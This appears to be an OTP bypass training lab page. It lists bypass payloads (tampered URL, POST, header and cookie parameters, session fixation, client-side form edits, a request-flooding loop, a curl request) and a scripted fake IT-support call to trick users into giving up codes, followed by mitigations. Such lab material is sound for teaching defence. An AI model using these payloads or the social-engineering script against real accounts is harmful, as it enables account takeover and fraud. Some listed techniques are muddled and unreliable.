Lab 1: Basic OTP Bypass - OTP Bypass Labs

Difficulty: Low

Lab Overview

This lab demonstrates basic OTP bypass vulnerabilities where attackers can circumvent OTP authentication through simple techniques like parameter manipulation, session hijacking, and basic social engineering.

Objective: Understand how basic OTP bypass attacks work and how to exploit them.

Vulnerable OTP System

Two-Factor Authentication

This system uses OTP for two-factor authentication. Try to bypass the OTP verification:

OTP Bypass Tester

⚠️ OTP Bypass Warning

This lab demonstrates basic OTP bypass vulnerabilities:

Parameter Manipulation - URL parameter tampering
Session Hijacking - Session token theft
Social Engineering - Human manipulation
No Rate Limiting - Unlimited attempts

Bypass Techniques

These techniques can be used to bypass OTP:

Parameter Manipulation - URL parameter tampering
Session Hijacking - Session token theft
Social Engineering - Human manipulation
No Rate Limiting - Unlimited attempts

Bypass Techniques

Parameter Manipulation

// URL parameter tampering ?otp_verified=true ?bypass_otp=1 ?skip_verification=yes

Session Hijacking

// Steal session token document.cookie = "session_id=stolen_token"; // Or use session fixation ?PHPSESSID=fixed_session_id

Social Engineering

// Call user pretending to be support "Hi, this is IT support. We need to verify your account. Can you share the OTP you just received?"

No Rate Limiting

// Unlimited OTP requests for (let i = 0; i < 1000; i++) { fetch('/send_otp', {method: 'POST'}); }

Client-Side Bypass

// Disable JavaScript validation document.getElementById('otp').disabled = false; // Or modify form action form.action = '/bypass_otp';

Header Manipulation

// Add bypass headers X-Bypass-OTP: true X-Admin-Override: 1 X-Skip-Verification: yes

Vulnerability Details

Type: Basic OTP Bypass
Severity: Medium
Method: Parameter manipulation
Issue: Missing validation

Attack Vectors

Parameter Manipulation: URL parameter tampering
Session Hijacking: Session token theft
Social Engineering: Human manipulation
No Rate Limiting: Unlimited attempts

Basic OTP Bypass Examples

Use these techniques to exploit basic OTP bypass vulnerabilities:

1. URL Parameter Bypass:

// Add bypass parameters to URL
?otp_verified=true
?bypass_otp=1
?skip_verification=yes
?admin_override=1
?otp_status=verified

2. POST Parameter Bypass:

// Send bypass parameters in POST data
otp_verified=true
bypass_otp=1
skip_verification=yes
admin_override=1
otp_status=verified

3. Header Bypass:

// Add bypass headers
X-Bypass-OTP: true
X-Admin-Override: 1
X-Skip-Verification: yes
X-OTP-Status: verified
X-Override-Auth: true

4. Cookie Bypass:

// Set bypass cookies
otp_verified=true
bypass_otp=1
skip_verification=yes
admin_override=1
otp_status=verified

5. Session Bypass:

// Manipulate session variables
$_SESSION['otp_verified'] = true;
$_SESSION['bypass_otp'] = 1;
$_SESSION['skip_verification'] = true;
$_SESSION['admin_override'] = 1;

6. JavaScript Bypass:

// Disable client-side validation
document.getElementById('otp').disabled = false;
document.getElementById('otp').value = 'bypass';
// Or modify form action
form.action = '/bypass_otp';
// Or submit form without OTP
form.submit();

7. Form Manipulation:

// Add hidden bypass fields

8. AJAX Bypass:

// Send bypass request via AJAX
fetch('/verify_otp', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
        otp: 'bypass',
        otp_verified: true,
        bypass_otp: 1
    })
});

9. cURL Bypass:

// Send bypass request via cURL
curl -X POST http://vulnerable-site.com/verify_otp \
  -d "otp=bypass&otp_verified=true&bypass_otp=1" \
  -H "X-Bypass-OTP: true"

10. Browser DevTools Bypass:

// Use browser dev tools to modify
// 1. Open DevTools (F12)
// 2. Go to Network tab
// 3. Intercept the OTP verification request
// 4. Modify the request parameters
// 5. Send the modified request

Real-World Attack Scenarios

Account takeover and unauthorized access
Financial fraud and payment manipulation
Authentication bypass and privilege escalation
Compliance violations and security breaches
Cross-site attacks and data exfiltration
Social engineering and phishing attacks

Mitigation Strategies

Implement proper server-side validation
Use secure session management
Implement rate limiting and throttling
Use secure OTP generation and delivery
Regular security testing and vulnerability assessments
Monitor for unusual authentication patterns
Implement proper authentication and authorization
Use secure coding practices
Implement proper error handling
Educate users about OTP security
Use multi-factor authentication
Implement proper logging and monitoring